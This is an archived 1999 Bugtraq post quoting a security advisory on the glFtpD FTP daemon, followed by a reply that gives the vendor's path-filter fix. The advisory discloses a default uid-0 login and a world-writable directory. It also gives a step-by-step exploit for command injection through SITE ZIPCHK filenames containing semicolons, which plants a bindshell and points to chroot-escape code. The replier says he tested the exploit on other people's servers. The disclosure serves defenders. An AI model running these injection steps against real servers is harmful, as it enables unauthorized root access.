![[LWN Logo]](/images/lwn.banner.gif)
Date: Thu, 23 Dec 1999 15:29:52 -0800 From: The Tree of Life <ttol@JAMES.KALIFORNIA.COM> Subject: Re: Multiple vulnerabilites in glFtpD (current versions) To: BUGTRAQ@SECURITYFOCUS.COM The fix (officially) from glftpd developers GreyLine and Usurper is: add "path-filter * /ftp-data/misc/pathmsg ^[-A-Za-z0-9_.()[:space:]]*$ ^\.^-" to config file. By the way, I tested the exploit on some *cough* warez sites and it worked. However, you only get access to commands that are in the bin directory, such as 'ls'. You don't get an actual account, but you do have complete control over the whole daemon and the directories. The fix will be included in the next glftpd release. Thanks, ttol www.scenereview.com "Millenium is 2001, not 2000. Christ.." On Thu, 23 Dec 1999, suid wrote: > Date: Thu, 23 Dec 1999 11:31:53 +1100 > From: suid <suid@SUID.KG> > To: BUGTRAQ@SECURITYFOCUS.COM > Subject: Multiple vulnerabilites in glFtpD (current versions) > > See this advisory on www.suid.kg/advisories/003.txt. > > suid@suid.kg - multiple vulnerabilities with glftpd 1.17.2 and below. > > Summary: > > glFtpD has several problems which can lead to a remote attacker attaining > root on your machine. > > Background: > > glFtpD is a FTP daemon available from www.glftpd.org. It claims to be a beta > release however it is in wide use accross the internet. > > glFtpD is a somewhat attractive choice for many non-technically minded people > it is simple to install and can run fine on the default configuration. It also > comes in flavours for Linux, FreeBSD and Solaris. > > glFtpD is also quite packed with "features" such as the ability to script > addons in tcl etc. With such a large amount of features it appears that the > attention paid to security has suffered somewhat during development. > > Vulnerabilities: > > 1) Default Login: > > By default glFtpD installs a user account on your new FTP server > called "glftpd" the password of this user is predictably "glftpd". > > This default user also has a UID of 0. This does translate into them > actually FTP'ing to your machine as uid == 0. Bad kitty. > > 2) World writable site directory: > > By default, your new ftp servers ~/site directory is world writable. > > 3) SITE ZIPCHK command: > > The SITE command ZIPCHK can be used to check the validity of a ZIP file on a server. > Presumably this is so you can make sure the ZIP file you are about to download is valid > and free from error. The way this works is thus: > > glFtpD user does: > ftp> quote SITE ZIPCHK XXXXX.ZIP > > glFtpD then runs a shell script with XXXXX.ZIP as argv[1] or 2. > which calls /bin/unzip etc etc. > > If a user is able to create a filename with ";" characters in the name, they can > execute arbitrary code on the remote server with the privelege level of the server. > > Authors Response: > > Originally I had some slightly misconceived exploit information. I had used SITE CHMOD > in my exploit instead of the unzip trick. No doubt glftpd users are aware that > site chmod is a `siteop' only command. So i used the unzip trick detailed below. I thank > him for this. > > Unfortunatly the authors response to the first vulnerability was: > > 1) The default login "gltftpd" is only available from localhost. Therefore not a problem? > > I present to you sir, several problems with this. > > - Local users. FTP localhost and have uid 0. Not a problem? > - TCP spoofing attacks. http://www.securityfocus.com/templates/advisory.html?id=1176 > - Regular FTP users use method 3 to get a shell and use that to ftp from localhost. Uid 0. > > > Exploit Information: > > 1) & 2) are traditionally bad. Problems are obvious. > > 3) This is quite simple a user need only have some place to upload files: > > - You will need to build some kind of backdoor to allow you access, using bindshell.c (again) > > $ gcc bindshell.c -o b -static > > - Create an empty file called " ; bash blah;" > - Create an empty file called " ; unzip blah;" > > $ > " ; bash blah;" > > - Create a script called "blah" : > > $ cat > blah > #!/bin/bash > ./b & > ^D > > - "ZIP" these files up. > > $ zip blah.zip blah b > > - Login to your FTP server. Now upload your files: > > ftp> put blah.zip > ftp> put " ; bash blah;" > ftp> put " ; unzip blah.zip;" > > - Because glFtpD attempts to convert spaces in filenames to underscores, youll need to rename > them back. > > ftp> quote rnfr "_;_bash_blah;" > ftp> quote rnto " ; bash blah;" > ftp> quote rnfr "_;_unzip_blah.zip;" > ftp> quote rnto " ; unzip blah.zip;" > > - Now run a ZIPCHK on the unzip one: > > ftp> quote SITE ZIPCHK " ; unzip blah.zip;" > > - Hurray, now do a few ls commands till you get a file listing. Now run: > > ftp> quote SITE ZIPCHK " ; bash blah;" > > - glFtpD will spit out an error message. Ignore it. Now telnet to the port defined within > bindshell.c. > > - Once your on. If you attacked the glftpd account (or any uid = 0 account), you may now use simple chroot() > breaking techniques (http://www.suid.kg/source/breakchroot.c) to have run of the entire box. > > - If you did not have a uid == 0 account. Youll probably be in a chroot environment and you > dont really have a way out except to: > > - check /etc/passwd (really $GLFTPDHOME/etc/passwd) > - Crack a uid == 0 passwd, maybe the glftpd account is still in there > - Use your imagination. > > > Working Papers: > > See the spectacle at http://www.suid.kg/advisories/003_wp.txt > > Links: > www.glftpd.org - Glftpd Home page > www.suid.kg/source/bindshell.c - bindshell.c > www.suid.kg/advisories/003_wp.txt - Example attack > > Greets: > > ^moo^, yowie, cr, duke, silvio, n1ck, > w00w00, and last but not least ADM >